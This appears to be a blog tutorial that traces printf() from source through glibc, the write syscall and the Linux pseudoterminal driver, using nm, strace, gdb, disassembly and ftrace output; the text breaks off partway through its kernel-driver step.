Tearing apart printf()


If ‘Hello World’ is the first program for C students, then printf() is probably the first function. I’ve had to answer questions about printf() many times over the years, so I’ve finally set aside time for an informal writeup. The common questions fit roughly into two forms:

  • Easy: How does printf mechanically solve the format problem?
  • Complex: How does printf actually display text on my console?

My usual answer?
“Just open up stdio.h and track it down”

This wild goose chase is not only a great learning experience, but also an interesting test for the dedicated beginner. Will they come back with an answer? If so, how detailed is it? What IS a good answer?


printf() in 30 seconds — TL;DR edition

printf’s execution is tailored to your system and generally goes like this:

  1. Your application uses printf()
  2. Your compiler/linker produce a binary. printf is a load-time pointer to your C library
  3. Your C runtime fixes up the format and sends the string to the kernel via a generic write
  4. Your OS mediates the string’s access to its console representation via a device driver
  5. Text appears on your screen

…but you probably already knew all that.

This is the common case for user-space applications running on an off-the-shelf system. (Side-stepping virtual/embedded/distributed/real-mode machines for the moment).

A more complicated answer starts with: It depends. printf mechanics vary across a long list of things: your compiler toolchain, your system architecture (including the operating system), and obviously how you’ve used it in your program. The outline above is generally correct but precisely useless for any specific situation.

If you’re not impressed, that’s good. Let’s refine it.


printf() in 90 seconds — Interview question edition

  1. You include the <stdio.h> header in your application
  2. You use printf non-trivially in your app.
  3. Your compiler produces object code — printf is recognized, but unresolved
  4. The linker constructs the executable, printf is tagged for run-time resolution
  5. You execute your program. Standard library is mapped in the process address space
  6. A call to printf() jumps to library code
  7. The formatted string is resolved in a temporary buffer
  8. Standard library writes to the stdout buffered stream. Eventual kernel write entry
  9. Kernel calls a driver write operation for the associated console
  10. Console output buffer is updated with the new string
  11. Output text appears on your console

Sounds better? There’s still a lot missing, including any mention of system specifics. More things to think about (in no particular order):

  • Are we using static or dynamic linkage? Normally printf is run-time linked, but there are exceptions.
  • What OS is this? The differences between them are drastic — When/how is stdout managed? What is the console and how is it updated? What is the kernel entry/syscall procedure…
  • Closely related to the OS…what kind of executable is this? If ELF, we need to talk about the GOT / PLT. If PE (Windows), then we need an import directory.
  • What kind of terminal are you using? Standard laptop/desktop? University cluster over ssh? Is this a virtual machine?
  • This list could go on forever, and all answers affect what really happens behind the scenes.

Things to know before continuing

The next part is targeted for C beginners who want to explore how functions execute through a complex system. I’m keeping the discussion at a high-level so we can focus on how many parts of the problem contribute to a whole solution. I’ll provide references to source code and technical documents so readers can explore on their own. No blog substitutes for authoritative documentation.

Now for a more important question:
Why do beginners get stuck searching for a detailed answer about basic functions like printf()?

I’ll boil it down to three problems:

Not understanding the distinct roles of the compiler, standard library, operating system, and hardware. You can’t look at just one aspect of a system and expect to understand how a function like printf() works. Each component handles a part of the ‘printf’ problem and passes the work to the next using common interfaces along the way. C compilers try to adhere to the ISO C standards. Operating systems may also follow standards such as POSIX/SUS. Standardization streamlines interoperability and portability, but with the cost of code complexity. Beginners often struggle following the chain of code, especially when the standard requirements end and the ‘actual work’ begins between the interfaces. The common complaint: Too many seemingly useless function calls between the interface and the work. This is the price of interoperability and there’s no easy + maintainable + scalable way around it!

Not grasping [compile/link/load/run]-time dynamics. Manual static analysis has limits, and so following any function through the standard library source code inevitably leads to a dead end: an unresolved jump table, an opaque macro with multiple expansions, or a hard stop at the end, an ambiguous function pointer. In printf’s case, that would be *write, which the operating system promises will exist at run-time. Modern compilers and OSs are designed to be multi-platform, and thus every possible code path that could exist is visible prior to compilation. Beginners may get lost in a code base where much of the source ‘compiles away’ and functions resolve dynamically at execution. Trivial case: If you call printf() on a basic string without formats, your compiler may emit a call to ‘puts’, discarding your printf entirely!

Not enough exposure to common abstractions used in complex software systems. Tracing any function through the compiler and OS means working through many disparate ideas in computing. For instance, many I/O operations involve the idea of a character stream. Buffering character I/O with streams has been part of Unix System V since the early 1980s, thanks in part to Dennis Ritchie, co-author of ‘The C Programming Language’. Since the 1990s, multiprocessing has become the norm. Tracing printf means stepping around locks, mutexes, semaphores, and other synchronization tools. More recently, i18n has upped the ante for simple console output. All these concepts taken together often distract and overwhelm beginners who are simply trying to understand one core problem.

Bottom line: Compilers, libraries, operating systems, and hardware are complex; we need to understand how each works together as a system in order to truly understand how printf() works.


printf() in 1000 seconds — TMI edition

(or ‘Too-specific-to-apply-to-any-system-except-mine-on-the-day-I-wrote-this edition’)

The best way to answer these questions is to work through the details on an actual system.

$uname -a
Linux localhost.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

$gcc --version
gcc (GCC) 4.8.5 20150623 (Red Hat 4.8.5-16)
Copyright (C) 2015 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

$ldd --version
ldd (GNU libc) 2.17
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Key points: Linux kernel 3.10 on x86-64, GCC 4.8.5, glibc 2.17.


Step 0 — What is printf?

printf() is an idea that the folks at Bell Labs believed in as early as 1972: A programmer should be able to produce output using various formats without understanding exactly what’s going on under the hood.

This idea is merely an interface.

The programmer calls printf and the system will handle the rest. That is why you’re presumably reading this article — hiding implementation details works!

Early compilers supported programmers exclusively through built-in functions. When toolchains became a business in the early 1980s (Manx/Aztec C, Lattice C), many provided C and ASM source code for common functions that developers could #include in their projects as needed. This allowed customization of built-ins at the application level — no more rebuilding your toolchain for each project. However, programmers were still at the mercy of various brands of compilers, each bringing their own vision of how to implement these functions and run-time.

Thankfully, most of this hassle has gone away today. So if you want to use printf…


Step 1 — Include the <stdio.h> header

Goal: Tap into the infinite power of the C standard library

The simple line of code #include <stdio.h> is possible across the vast majority of computer systems thanks to standards. Specifically, ISO/IEC 9899.

In 1978, Brian Kernighan and Dennis Ritchie described printf in its full variadic form to include nine types of formats:

printf(control, arg1, arg2, ...);    # K&R (1st ed.)

This was as close as the industry would get to a standard for the next decade. Between 1983 and 1989, the ANSI committee worked on the formal standard that eventually brought the printf interface to its familiar form:

int printf(const char *format, ...);   # ANSI C (1989)

Here’s an oft-forgotten bit of C trivia: printf returns a value (the actual character output count). The interface from 1978 didn’t mention a return value, but the implied return type is integer under K&R rules. The earliest known compiler (linked above) did not return any value.

The most recent C standard from 2011 shows that the interface changed by only one keyword in the intervening 20 years:

int printf(const char * restrict format, ...);  # Latest ISO C (2011)

‘restrict’ (a C99 feature) allows the compiler to optimize without concern for pointer aliasing.

Over the past 40 years, the interface for printf is mostly unchanged, thus highly backwards compatible. However, the feature set has grown quite a bit:

1972            | 1978                 | 1989               | 2011
%d: decimal     | Top 3 from ’72       | All from ’78 plus… | Too many!
%o: octal       | %x: hexadecimal      | %i: signed int     | Read the manual, pp. 309-315
%s: string      | %u: unsigned decimal | %p: void pointer   |
%p: string ptr  | %c: byte/character   | %n: output count   |
                | %e,f,g: floats/dbl   | %%: complete form  |

Step 2 — Use printf() with formats

Goal: Make sure your call to printf actually uses printf()

We’ll test out printf() with two small plagiarized programs. However, only one of them is truly a candidate to trace printf().

Trivial printf(): printf0.c

$ cat printf0.c
#include <stdio.h>

int main(int argc, char **argv)
{
  printf("Hello World\n");
  return 0;
}

Better printf(): printf1.c

$ cat printf1.c
#include <stdio.h>

int main(int argc, char **argv)
{
  printf("Hello World %d\n",1);
  return 0;
}

The difference is that printf0.c does not actually contain any formats, thus there is no reason to use printf. Your compiler won’t bother to use it. In fact, you can’t even disable this ‘optimization’ using GCC -O0 because the substitution (fold) happens during semantic analysis (GCC lingo: Gimplification), not during optimization. (GCC’s -fno-builtin-printf flag does turn it off.) To see this in action, we must compile!

Possible trap: Some compilers may recognize the ‘1’ literal used in printf1.c, fold it into the string, and avoid printf() in both cases. If that happens to you, substitute an expression that must be evaluated.


Step 3 — Compiler produces object code

Goal: Organize the components (symbols) of your application

Compiling programs results in an object file, which contains records of every symbol in the source file. Each .c file compiles to a .o file, but none of them has seen any other files (no linking yet). Let’s look at the symbols in both of the programs from the last step.

Trivial printf()

$ gcc printf0.c -c -o printf0.o
$ nm printf0.o
0000000000000000 T main
                 U puts

More useful printf()

$ gcc printf1.c -c -o printf1.o
$ nm printf1.o
0000000000000000 T main
                 U printf

As expected, the trivial printf usage has a symbol for a simpler function, puts. The file that included a format has a symbol for printf instead. In both cases, the symbol is undefined. The compiler doesn’t know where puts() or printf() are defined, but it knows that they exist thanks to stdio.h. It’s up to the linker to resolve the symbols.


Step 4 — Linking brings it all together

Goal: Build a binary that includes all code in one package

Let’s compile and link both files again, this time both statically and dynamically.

$ gcc printf0.c -o printf0            # Trivial printf dynamic linking
$ gcc printf1.c -o printf1            # Better printf dynamic linking
$ gcc printf0.c -o printf0_s -static  # Trivial printf static linking
$ gcc printf1.c -o printf1_s -static  # Better printf static linking

Possible trap: You need to have the static standard library available to statically link (libc.a). Most systems already have the shared library built-in (libc.so). Windows users will need a libc.lib and maybe a libmsvcrt.lib. I haven’t tested in an MS environment in a while.

Static linking pulls all the standard library object code into the executable. The benefit for us is that all of the code executed in user space is now self-contained in this single file and we can easily trace to see the standard library functions. In real life, you rarely want to do this. The disadvantages are just too great, especially for maintainability. Here’s an obvious disadvantage:

$ ls -l printf1*
total 1696
-rwxrwxr-x. 1 maiz maiz   8520 Mar 31 13:38 printf1     # Dynamic
-rw-rw-r--. 1 maiz maiz    101 Mar 31 12:57 printf1.c
-rw-rw-r--. 1 maiz maiz   1520 Mar 31 13:37 printf1.o
-rwxrwxr-x. 1 maiz maiz 844000 Mar 31 13:40 printf1_s   # Static

Our test binary blew up from 8kb to 844kb. Let’s take a look at the symbol count in each:

$ nm printf1.o | wc -l
2                      # Object file symbol count (main, printf)
$ nm printf1 | wc -l
34                     # Dynamic-linked binary symbol count
$ nm printf1_s | wc -l
1873                   # Static-linked binary symbol count

Our original, unlinked object file had just the two symbols we already saw (main and printf). The dynamic-linked binary has 34 symbols, most of which correspond to the C runtime, which sets up the environment. Finally, our static-linked binary has nearly 2000 symbols, which include everything that could be used from the standard library.

As you may know, this has a significant impact on load-time and run-time.


Step 5 — Loader prepares the run-time

Goal: Set up the execution environment

The dynamic-linked binary has more work to do than its static brother. The static version included 1873 symbols, but the dynamic binary only included 34 with the binary. It needs to find the code in shared libraries and memory map it into the process address space. We can watch this in action by using strace.

Dynamic-linked printf() syscall trace

$ strace ./printf1
execve("./printf1", ["./printf1"], [/* 47 vars */]) = 0
brk(NULL) = 0x1dde000
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce82000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=83694, ...}) = 0
mmap(NULL, 83694, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f59bce6d000
close(3) = 0
open("/lib64/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2127336, ...}) = 0
mmap(NULL, 3940800, ..., 3, 0) = 0x7f59bc89f000
mprotect(0x7f59bca57000, 2097152, PROT_NONE) = 0
mmap(0x7f59bcc57000, 24576, ..., 3, 0x1b8000) = 0x7f59bcc57000
mmap(0x7f59bcc5d000, 16832, ..., -1, 0) = 0x7f59bcc5d000
close(3) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce6c000
mmap(NULL, 8192, ..., -1, 0) = 0x7f59bce6a000
arch_prctl(ARCH_SET_FS, 0x7f59bce6a740) = 0
mprotect(0x7f59bcc57000, 16384, PROT_READ) = 0
mprotect(0x600000, 4096, PROT_READ) = 0
mprotect(0x7f59bce83000, 4096, PROT_READ) = 0
munmap(0x7f59bce6d000, 83694) = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce81000
write(1, "Hello World 1\n", 14Hello World 1) = 14
exit_group(0) = ?
+++ exited with 0 +++

Each line is a syscall. The first is just after bash clones into printf1, and the write syscall is near the bottom. The 21 syscalls between brk and the final fstat are devoted to loading shared libraries. This is the load-time penalty for dynamic linking. Don’t worry if this seems like a mess; we won’t be using it. If you’re interested in more detail, here is the full dump with walkthrough.

Now let’s look at the memory map for the process

Dynamic-linked printf() memory map

$ cat /proc/3177/maps
00400000-00401000 r-xp 00000000         ./printf1
00600000-00601000 r--p 00000000         ./printf1
00601000-00602000 rw-p 00001000         ./printf1
7f59bc89f000-7f59bca57000 r-xp 00000000 /usr/lib64/libc-2.17.so
7f59bca57000-7f59bcc57000 ---p 001b8000 /usr/lib64/libc-2.17.so
7f59bcc57000-7f59bcc5b000 r--p 001b8000 /usr/lib64/libc-2.17.so
7f59bcc5b000-7f59bcc5d000 rw-p 001bc000 /usr/lib64/libc-2.17.so
7f59bcc5d000-7f59bcc62000 rw-p 00000000  
7f59bcc62000-7f59bcc83000 r-xp 00000000 /usr/lib64/ld-2.17.so
7f59bce6a000-7f59bce6d000 rw-p 00000000  
7f59bce81000-7f59bce83000 rw-p 00000000  
7f59bce83000-7f59bce84000 r--p 00021000 /usr/lib64/ld-2.17.so
7f59bce84000-7f59bce85000 rw-p 00022000 /usr/lib64/ld-2.17.so
7f59bce85000-7f59bce86000 rw-p 00000000  
7fff89031000-7fff89052000 rw-p 00000000 [stack]
7fff8914e000-7fff89150000 r-xp 00000000 [vdso]
ffffffffff600000-ffffffffff601000 r-xp  [vsyscall]

Our 8kb binary fits into three 4kb memory pages (top three lines). The standard library has been mapped into roughly the middle of the address space. Code execution begins in the code area at the top, and jumps into the shared library as needed.

This is the last I’ll mention the dynamic-linked version. We’ll use the static version from now on since it’s easier to trace.

Static-linked printf() syscall trace

$ strace ./printf1_s
execve("./printf1_s", ["./printf1_s"],[/*47 vars*/]) = 0
uname({sysname="Linux", nodename="...", ...}) = 0
brk(NULL) = 0x1d4a000
brk(0x1d4b1c0) = 0x1d4b1c0
arch_prctl(ARCH_SET_FS, 0x1d4a880) = 0
brk(0x1d6c1c0) = 0x1d6c1c0
brk(0x1d6d000) = 0x1d6d000
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7faad3151000
write(1, "Hello World 1\n", 14Hello World 1) = 14
exit_group(0) = ?
+++ exited with 0 +++

The static-linked binary uses far fewer syscalls. Note three of them near the bottom: fstat, mmap, and write. These occur during printf(). We’ll trace this better in the next step. First, let’s look at the static memory map:

Static-linked printf() memory map

$ cat /proc/3237/maps
00400000-004b8000 r-xp 00000000         ./printf1_s
006b7000-006ba000 rw-p 000b7000         ./printf1_s
006ba000-006df000 rw-p 00000000         [heap]
7ffff7ffc000-7ffff7ffd000 rw-p 00000000 
7ffff7ffd000-7ffff7fff000 r-xp 00000000 [vdso]
7ffffffde000-7ffffffff000 rw-p 00000000 [stack]
ffffffffff600000-ffffffffff601000 r-xp  [vsyscall]

No hint of a shared library. That’s because all the code is now included on the first two lines within the printf1_s binary. The static binary is using 187 pages of memory, just short of 800kb. This follows what we know about the large binary size.

Now we’ll move on to the more interesting part: execution.


Step 6 — printf call jumps to the standard library

Goal: Follow the standard library call sequence at run-time

The programmer shapes code for the printf interface then the run-time library bridges the standard API and the OS interface.

Key point: A compiler/library is free to handle logic any way it wants between interfaces. After printf is called, there is no standard defined procedure required, except that the correct output is produced and within certain boundaries. There are many possible paths to the output, and every toolchain handles it differently. In general, this work is done in two parts: A platform-independent side where a call to printf solves the format substitution problem (Step 6, Step 7). The other is a platform-dependent side, which calls into the OS kernel using the properly-formatted string (Step 8).

The next three steps will focus solely on the static-linked version of printf. It’s less tedious to trace static-linked source, especially through the kernel in the next few steps. Note that the number of instructions executed differs between the two: ~2300 for dynamic and ~1600 for static.

In addition to printf, compliant C compilers also implement:

fprintf() — A generalized version of printf, except the output can go to any file stream, not just the console. fprintf is notable because the C standard defines the supported format types in its description. fprintf() isn’t used here, but it’s good to know about since it’s related to the next function.

vfprintf() — Similar to fprintf except the variadic arguments are reduced to a single pointer to a va_list. libc does almost all printing work in this function, including format replacement. (f)printf merely calls vfprintf almost immediately. vfprintf then uses the libio interface to write final strings to streams.

These high-level print functions obey buffering rules defined on the stream descriptor. The output string is constructed in the buffer using internal glibc (libio) functions. Finally, write is the final step before handing work to the kernel. If you aren’t familiar with how these work, I recommend reading about the glibc way of managing I/O.

Bonus: Some extra reading about buffering with nice diagrams

Let’s trace our path through the standard library

printf() execution sequence

$ gdb ./printf1_s
…
main at printf1.c:5
5 printf("Hello World %d\n", 1);
0x400e02 5 printf("Hello World %d\n", 1);
0x401d30 in printf ()
0x414600 in vfprintf ()
0x40c110 in strchrnul ()
0x414692 in vfprintf ()
0x423c10 in _IO_new_file_xsputn ()
0x424ba0 in _IO_new_file_overflow ()
0x425ce0 in _IO_doallocbuf ()
0x4614f0 in _IO_file_doallocate ()
0x4235d0 in _IO_file_stat ()
0x40f8b0 in _fxstat ()   ### fstat syscall
0x461515 in _IO_file_doallocate ()
0x410690 in mmap64 ()   ### mmap syscall
0x46155e in _IO_file_doallocate ()
0x425c70 in _IO_setb ()
0x461578 in _IO_file_doallocate ()
0x425d15 in _IO_doallocbuf ()
0x424d38 in _IO_new_file_overflow ()
0x4243c0 in _IO_new_do_write ()
0x423cc1 in _IO_new_file_xsputn ()
0x425dc0 in _IO_default_xsputn ()
…cut 11 repeats of last 2 functions…
0x425e7c in _IO_default_xsputn ()
0x423d02 in _IO_new_file_xsputn ()
0x41475e in vfprintf ()
0x414360 in _itoa_word ()
0x4152bb in vfprintf ()
0x423c10 in _IO_new_file_xsputn ()
0x40b840 in mempcpy ()
0x423c6d in _IO_new_file_xsputn ()
0x41501f in vfprintf ()
0x40c110 in strchrnul ()
0x414d1e in vfprintf ()
0x423c10 in _IO_new_file_xsputn ()
0x40b840 in mempcpy ()
0x423c6d in _IO_new_file_xsputn ()
0x424ba0 in _IO_new_file_overflow ()
0x4243c0 in _IO_new_do_write ()
0x4235e0 in _IO_new_file_write ()
0x40f9c7 in write ()
0x40f9c9 in __write_nocancel ()   ### write syscall happens here
0x423623 in _IO_new_file_write ()
0x42443c in _IO_new_do_write ()
0x423cc1 in _IO_new_file_xsputn ()
0x414d3b in vfprintf ()
0x408450 in free ()
0x41478b in vfprintf ()
0x408450 in free ()
0x414793 in vfprintf ()
0x401dc6 in printf ()
main at printf1.c:6

This call trace shows the entire execution for this printf example. If you look closely at the trace, you can follow this basic logic:

  • printf passes string and formats to vfprintf
  • vfprintf starts to parse and attempts its first buffered write
  • Oops — buffer needs to be allocated. Let’s find some memory
  • vfprintf back to parsing…
  • Copy some results to a final location
  • We’re done — call write()
  • Clean up this mess

Let’s look at some of the functions:

_IO_* functions are part of glibc’s libio module, which manages the internal stream buffer. Just looking at the names, we can guess that there is a lot of writing and memory allocation. The source code for most of these operations is in the files fileops.c and genops.c.

_fxstat pulls the state of file descriptors. Since this is system dependent, it’s located at /sysdeps/unix/sysv/linux/fxstat64.c.

The remaining functions are covered in detail in the next two steps.

Let’s dig more!


Step 7 — Format string resolved

Goal: Solve the format problem

Let’s think about our input string, Hello World %d\n. There are three distinct sections that need to be processed as we scan across it from left to right.

  • 'Hello World ' — simple put
  • %d — substitute the integer literal ‘1’
  • \n — simple put

Now referring back to our trace, we can find three code sections that suggest where to look for the formatting work:

0x400e02 5  printf("Hello World %d\n", 1);
0x401d30 in printf ()
0x414600 in vfprintf ()
0x40c110 in strchrnul ()           # string scanning
0x414692 in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering 'Hello World '
...
0x41475e in vfprintf ()
0x414360 in _itoa_word ()          # converting integer
0x4152bb in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering '1'
...
0x41501f in vfprintf ()
0x40c110 in strchrnul ()           # string scanning
0x414d1e in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering '\n'
...

The hand off to the kernel comes a few function calls after that final vfprintf() call, so the formatting must have happened in vfprintf between the instructions indicated above. After each substitution, vfprintf hands libio a pointer to the finished piece of the string for line buffering. Let’s take a peek at the first round only:

The hand off to xsputn requires vfprintf to identify the start location in the string and a size. The start is already known (current position), but it’s up to strchrnul() to find a pointer to the start of the next ‘%’ or the end of string. We can follow the parsing rules in the glibc source code (/stdio-common/printf-*).

from glibc/stdio-common/printf-parse.h:

/* Find the next spec in FORMAT, or the end of the string.  Returns
   a pointer into FORMAT, to a '%' or a '\0'.  */
__extern_always_inline const unsigned char *
__find_specmb (const unsigned char *format)
{
  return (const unsigned char *) __strchrnul ((const char *) format, '%');
}

Or we can look in the compiled binary (my preferred timesink):

in vfprintf:
  0x414668 <+104>: mov    esi,0x25   # Setting ESI to the '%' symbol
  0x41466d <+109>: mov    rdi,r12    # Pointing RDI to the format string
  ...saving arguments...
  0x41468d <+141>: call   0x40c110 <strchrnul> # Search for next % or end

in strchrnul:
  0x40c110 <+0>: movd   xmm1,esi   # Loading up an SSE register with '%'
  0x40c114 <+4>: mov    rcx,rdi    # Moving the format string pointer
  0x40c117 <+7>: punpcklbw xmm1,xmm1 # Vector-izing '%' for a fast compare
  ...eventual return of a pointer to the next token...

Long story short, we’ve located where formats are found and processed.

That’s going to be the limit of peeking at source code for glibc. I don’t want this article to become an ugly mess. In any case, the buffer is ready to go after all three format processing steps.


Step 8 — Final string written to standard output

Goal: Follow events leading up to the kernel syscall

The formatted string, “Hello World 1”, now lives in a buffer as part of the stdout file stream. stdout to a console is usually line buffered, but exceptions do exist. All cases for console stdout eventually lead to the ‘write’ syscall, which is prototyped for the particular system. UNIX(-like) systems conform to the POSIX standard, if only unofficially. POSIX defines the write syscall:

ssize_t write(int fildes, const void *buf, size_t nbyte);

From the trace in step 6, recall that the functions leading up to the syscall are:

0x4235e0 in _IO_new_file_write ()  # libio/fileops.c
0x40f9c7 in write ()               # sysdeps/unix/sysv/linux/write.c
0x40f9c9 in __write_nocancel ()    # various macros in libc and linux
  ### write syscall happens here

The link between compiled code and the operating system is the ABI, which is architecture dependent. That’s why we see a jump from glibc’s libio code to the code for our test architecture under (glibc)/sysdeps. When your standard library and OS are compiled for your system, these links are resolved and only the applicable ABI remains. The resulting write call is best understood by looking at the object code in our program (printf1_s).

First, let’s tackle one of the common complaints from beginners reading glibc source code…the 1000 different ways write() appears. At the binary level, this problem goes away after static-linking. In our case, write() == __write() == __libc_write()

$ nm printf1_s | grep write
6b8b20 D _dl_load_write_lock
41f070 W fwrite
400575 t _i18n_number_rewrite
40077f t _i18n_number_rewrite
427020 T _IO_default_write
4243c0 W _IO_do_write
4235e0 W _IO_file_write
41f070 T _IO_fwrite
4243c0 T _IO_new_do_write
4235e0 T _IO_new_file_write
421c30 T _IO_wdo_write
40f9c0 T __libc_write     ## Real write in symbol table
43b220 T __libc_writev
40f9c0 W write            ## Same address -- weak symbol
40f9c0 W __write          ## Same address -- weak symbol
40f9c9 T __write_nocancel
43b220 W writev
43b220 T __writev

So any reference to these symbols actually jumps to the same executable code. For what it’s worth, writev() == __writev(), and fwrite() == _IO_fwrite.

And what does __libc_write look like…?

000000000040f9c0 <__libc_write>:
  40f9c0:  83 3d c5 bb 2a 00 00   cmpl   $0x0,0x2abbc5(%rip)  # 6bb58c <__libc_multiple_threads>
  40f9c7:  75 14                  jne    40f9dd <__write_nocancel+0x14>

000000000040f9c9 <__write_nocancel>:
  40f9c9:	b8 01 00 00 00       	mov    $0x1,%eax
  40f9ce:	0f 05                	syscall 
  ...cut...

Write simply checks the threading state and, assuming all is well, moves the write syscall number (1) into EAX and enters the kernel.

Some notes:

  • x86-64 Linux write syscall is 1, old x86 was 4
  • rdi holds the file descriptor (1 for stdout)
  • rsi points to the string
  • rdx is the string size count

Step 9 — Driver writes output string

Goal: Show the execution steps from syscall to driver

Now we’re in the kernel with rdi, rsi, and rdx holding the call parameters. Console behavior in the kernel depends on your current environment. Two contrasting cases are printing to the native console/CLI and printing in a desktop pseudoterminal, such as GNOME Terminal.

I tested both types of terminals on my system and I’ll walk through the desktop pseudoterminal case. Counter-intuitively, the desktop environment is easier to explain despite the extra layers of work. The PTY is also much faster: the process has exclusive use of the pty, whereas many processes are aware of (and contend for) the native console.

We need to track code execution within the kernel, so let’s give Ftrace a shot. We’ll start by making a short script that activates tracing, runs our program, and deactivates tracing. Although execution only lasts for a few milliseconds, that’s long enough to produce tens or hundreds of thousands of lines of kernel activity.

#!/bin/sh
echo function_graph > /sys/kernel/debug/tracing/current_tracer
echo 1 > /sys/kernel/debug/tracing/tracing_on
./printf1_s
echo 0 > /sys/kernel/debug/tracing/tracing_on
cat /sys/kernel/debug/tracing/trace > output

Here is what happens after our static-linked printf executes the write syscall in a GNOME Terminal:

7)           | SyS_write() {
7)           |  vfs_write() {
7)           |   tty_write() {
7) 0.053 us  |    tty_paranoia_check();
7)           |    n_tty_write() {
7) 0.091 us  |     process_echoes();
7)           |     add_wait_queue()
7) 0.026 us  |     tty_hung_up_p();
7)           |     tty_write_room()
7)           |     pty_write() {
7)           |      tty_insert_flip_string_fixed_flag()
7)           |      tty_flip_buffer_push() {
7)           |       queue_work_on()
7)+10.288 us |      } /* tty_flip_buffer_push */
7)           |      tty_wakeup() 
7)+14.687 us |     } /* pty_write */
7)+57.252 us |    } /* n_tty_write */
7)+61.647 us |   } /* tty_write */
7)+64.106 us |  } /* vfs_write */
7)+64.611 us | } /* SyS_write */

This output has been culled to fit this screen. Over 1000 lines of kernel activity were cut within SyS_write, most of which were locks and the kernel scheduler. The total time spent in kernel is 65 microseconds. This is in stark contrast to the native terminal, which took over 6800 microseconds!

Now is a good time to step back and think about how pseudoterminals are implemented. As I was researching a good way to explain it, I happened upon an excellent write-up by Linus Åkesson. He explains it far better than I could. This diagram he drew up fits our case perfectly.

The TL;DR version is that pseudoterminals have a master and a slave side. A TTY driver provides the slave functionality while the master side is controlled by a terminal process.
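The master/slave split is easy to poke at from user space. The sketch below is my own illustration, assuming Linux with /dev/ptmx available: it opens a fresh pseudoterminal pair, writes to the slave side the way printf1_s writes to its stdout, and reads the result back from the master side the way a terminal emulator would. pty_roundtrip is a hypothetical helper name.

```cpp
// Sketch: open a pseudoterminal pair, write to the slave, read from the master.
// Linux/POSIX only; pty_roundtrip is a hypothetical helper for illustration.
#include <cstddef>
#include <cstdlib>     // posix_openpt, grantpt, unlockpt, ptsname
#include <fcntl.h>     // open, O_RDWR, O_NOCTTY
#include <string>
#include <unistd.h>    // read, write, close

// Returns whatever the master side receives, or an empty string on any failure.
std::string pty_roundtrip(const std::string& message) {
    int master = posix_openpt(O_RDWR | O_NOCTTY);
    if (master < 0) return "";
    std::string received;
    if (grantpt(master) == 0 && unlockpt(master) == 0) {
        const char* slave_path = ptsname(master);  // a path such as /dev/pts/N
        int slave = slave_path ? open(slave_path, O_RDWR | O_NOCTTY) : -1;
        if (slave >= 0) {
            // This plays the role of the program writing to its stdout.
            if (write(slave, message.data(), message.size()) > 0) {
                char buffer[256];
                // This plays the role of the terminal process reading the output.
                ssize_t count = read(master, buffer, sizeof buffer);
                if (count > 0) received.assign(buffer, static_cast<std::size_t>(count));
            }
            close(slave);
        }
    }
    close(master);
    return received;
}
```

With default terminal settings the line discipline usually rewrites "\n" as "\r\n" on output, so the master may receive a slightly longer string than the slave was given.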

Let’s demonstrate that on my system. Recall that I’m testing through a gnome-terminal window.

$ ./printf1_s
Hello World 1
^Z
[1]+  Stopped                 ./printf1_s
$ top -o TTY
[Screenshot: printf tty/pts usage]

bash is our terminal parent process using pts/0. The shell forked (cloned) top and printf. Both inherited the bash stdin and stdout.

Let’s take a closer look at the pts/0 device the kernel associates with our printf1_s process.

$ ls -l /dev/pts/0
crw--w----. 1 maizure tty 136, 0 Apr  1 09:55 /dev/pts/0

Notice that the pseudoterminal itself is associated with a regular tty device. It also has a major number 136. What’s that?

From the Linux kernel source for this version, include/uapi/linux/major.h:

...
#define UNIX98_PTY_MASTER_MAJOR	128
#define UNIX98_PTY_MAJOR_COUNT	8
#define UNIX98_PTY_SLAVE_MAJOR	(UNIX98_PTY_MASTER_MAJOR+UNIX98_PTY_MAJOR_COUNT)
...

Yes, this major number is associated with a pseudoterminal slave (Master = 128, Slave = 128 + 8 = 136). A tty driver is responsible for its operation. If we revisit our write syscall trace, this makes sense:
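The same arithmetic can be checked from a program. This is a small sketch of my own, assuming Linux and glibc: it mirrors the three constants from major.h and asks fstat() for the device behind a file descriptor. The helper names are hypothetical.

```cpp
// Sketch: classify a device major number using the constants quoted from major.h.
// is_unix98_pty_slave_major and fd_is_pty_slave are hypothetical helper names.
#include <sys/stat.h>       // fstat, S_ISCHR
#include <sys/sysmacros.h>  // major()
#include <unistd.h>         // STDOUT_FILENO

constexpr unsigned kPtyMasterMajor = 128;  // UNIX98_PTY_MASTER_MAJOR
constexpr unsigned kPtyMajorCount  = 8;    // UNIX98_PTY_MAJOR_COUNT
constexpr unsigned kPtySlaveMajor  = kPtyMasterMajor + kPtyMajorCount;  // 136

// Slave majors span kPtyMajorCount consecutive numbers starting at 136.
constexpr bool is_unix98_pty_slave_major(unsigned device_major) {
    return device_major >= kPtySlaveMajor &&
           device_major < kPtySlaveMajor + kPtyMajorCount;
}

// True when the descriptor refers to a character device with a pty slave major.
bool fd_is_pty_slave(int fd) {
    struct stat info;
    if (fstat(fd, &info) != 0 || !S_ISCHR(info.st_mode)) return false;
    return is_unix98_pty_slave_major(major(info.st_rdev));
}
```

Run inside a desktop terminal, fd_is_pty_slave(STDOUT_FILENO) should come back true; redirect stdout to a file and it should come back false.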

...cut from earlier
7)           |  pty_write() {
7)           |      tty_insert_flip_string_fixed_flag()
7)           |      tty_flip_buffer_push() {
7)           |          queue_work_on()
